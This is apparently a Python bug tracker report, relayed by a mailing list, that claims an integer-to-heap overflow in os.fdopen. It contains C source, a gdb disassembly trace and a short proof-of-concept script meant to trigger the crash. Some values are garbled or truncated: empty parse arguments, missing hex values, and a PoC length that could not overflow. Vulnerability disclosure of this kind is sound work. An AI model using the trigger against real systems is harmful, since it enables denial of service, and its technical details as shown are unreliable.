New submission from Rustemzade Mehemmed:
I have tested this vulnerability on the Python 2.7 and it absolutely affected
:). Integer overflow produce in posix_fdopen function. If an attacker sent
fdopen mode value larger than max integer value (2*32) to fdopen after integer
overflow occurred.
int fd;
char *orgmode = "r";
int bufsize = -1;
FILE *fp;
PyObject *f;
char *mode;
if (!PyArg_ParseTuple(args, "i|si", , , ))
return NULL;
/* Sanitize mode. See fileobject.c */
mode = PyMem_MALLOC(strlen(orgmode)+3);
...
strcpy(mode, orgmode);
os.fdopen(fd[, mode[, bufsize]])
fo = os.fdopen(fd, "r"*0x)
0x5e2595 <+86>: movedi,eax
=> 0x5e2598 <+89>: call 0x416e50 <strlen@plt>
(gdb) print /x $eax
$1 = 0x
after does addition of "add" instruction therefore overflow occured and =>
0x5e259d <+94>: addeax,0x3
(gdb) print /x $eax
$5 = 0x2
and memory allocate after buffer copy== >
0x5e25a1 <+98>: movedi,eax
0x5e25a4 <+101>: call 0x48f793 <_PyMem_DebugMalloc>
0x5e25cb <+140>: movesi,edx
...
0x5e25ce <+143>: movedi,eax
0x5e25d1 <+146>: call 0x416b80 <strcpy@plt>
copy buffer
strcpy(mode, orgmode); <=== overflow
poc:
#!/usr/bin/python
import os, sys
fd = os.open( "foo.txt", os.O_RDWR|os.O_CREAT )
fo = os.fdopen(fd, "r"*0xff)
print "Closed the file successfully!!"
--
messages: 267447
nosy: madness
priority: normal
severity: normal
status: open
title: Heap overflow occurred due to the int overflow
___
Python tracker <rep...@bugs.python.org>
<http://bugs.python.org/issue27235>
___
___
Python-bugs-list mailing list
Unsubscribe:
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
